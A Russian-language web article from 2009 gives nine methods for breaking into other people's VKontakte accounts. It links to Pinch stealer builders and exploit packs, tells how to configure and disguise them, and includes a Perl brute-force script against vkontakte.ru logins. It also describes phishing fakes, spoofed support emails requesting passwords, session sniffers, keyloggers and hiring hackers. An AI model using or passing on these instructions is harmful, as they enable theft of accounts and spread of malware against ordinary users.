| Главная » Статьи » Секреты в контакте |
Как взломать Контакт
 Итак, что же нам потребуется: Умение настраивать пинч (если это у вас уже получилось, то остальные 2 требования можно не смотреть) Прямые руки и хотя бы капелька мозга! 1 Способ - Взлом мыла: Если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты. Но есть и один минус, если пароль "корявый", он разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. Не в этом суть, поэтому останавливаться не будем. 2 Способ - Фейк: Достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд), скачать его можно по этой ссылке. 3 Способ - Троян: Этот способ мы разберём по пунктам: а) Скинуть "чистый" файл, либо ссылку на загрузку трояна, но тут еще надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь лежит билдер пинча, а здесь парсер http://slil.ru/25774491 , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - http://slil.ru/25774495 б) Кейлогер - менее полезный, но если жертва его "словит", и вы покопаетесь (причем очень долго) с отчетом, то пароль получите 100% в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном, примерно, 6/10. Советую армитаж (айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы (db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777 Скачать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армитаж Когда будите настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну чтобы внимания не привлекало. Папку в которой будет лежать сплоит, тоже переиминуйте на что-нибудь типа myphotos и тд. т.к. люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT - лишнее палево ни к чему. Идем дальше... Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был. Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он будет лежать в папке load под именем file. Кидаем ссылку жертве, и ждем с надеждой на то, что ее пробьет и отчет с заветным паролем придет к нам. 4 Способ - Брутфорс: Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает (нп-р в случае пароля D5&%-AefV) Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw…ctiveperl.html либо по ссылке http://www.denwer.ru/packages/perl.html Code #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; open (pass, “create(&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPor t=>80); print $sock “HEAD http://vkontakte.ru/ HTTP/1.0rn”. “Host: vkontakte.rurn”. “Accept: */*rn”. “Content-Type: application/x-www-form-urlencodedrn”. “User-Agent: Mozillorn”. “C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn”. “Connection: closernrn”; $answ = ; close $sock; print “$pass $answ”; if ($answ =~ /302/){ open (good, ‘>>good.txt’); print good “$id:$pass:$md5n”; print “$id:$pass:$md5n”; close good; exit;} } } goto Next; sub pass { my (@mas); while (){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } Не забудьте сменить разширение на brut.pl $dic = ‘passl.txt’; #паслист для брдутфорсера $id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы) $mail = ‘мыло’; #мыло, значек @ меняем на %40 $threads = Х; # где Х - количество потоков Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если не запускается - это ваши проблемы, ибо все прекрасно работает! 5 Способ Самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ****** Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, т.к. теперь у нас на ссылке комбинированная атака на мозг (фейк) и браузер (код ******). 6 Способ: Довольно известный, здесь нужно поискать сайты на которых сидит жертва (форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного, авось найдем старый заброшенный пароль, а он подойдет. 7 Способ: Как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля. Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и т.п., от такого-то пользователя, чтобы ее прочитать перейдите по ссылке, а ссылка будет вести на наш фейк. Чтобы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic.ru/soft/programm_4223.html, либо любой подходящий для вас из гугла. Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия. (чтобы пароли пришли именно вам на почту). Снифер, тут лучше отправлять его на почту (если мы знаем мыло), тогда без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем. http://forum.antichat.ru/showthread.php?p=457280 Есть сниферы и получше, но они платные, все же тема распространена, в гуле можно ввсести запрос на php снифер и найти много полезной инфы. 8 Способ - ХSS: Паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если очень долго подождать, то можно и дождаться паблик уязвимости - но такой подход к делу бредовый, поэтому останавливаться на нем не будем. 9 Способ - Самый простой: Единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог ни один из вышеперечисленных пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www.hackzone.ru/forum/list/fid/23/ или здесь http://www.hackzone.ru/forum/list/fid/4/ Но перед тем как задать вопрос воспользуйтесь полезными ссылками: google.ru http://www.poiskinfo.net/stat/st1.php http://segfault.kiev.ua/smart-questions-ru.html http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm Ну и на последок - googleforidiots.com На этом все, надеюсь вам не было скучно при чтении этой статьи. | |
Категория: Секреты в контакте | Добавил: Site_Admin (07.05.2009)
| |
| Просмотров: 137287 | Теги: | Рейтинг: 4.3/201 |
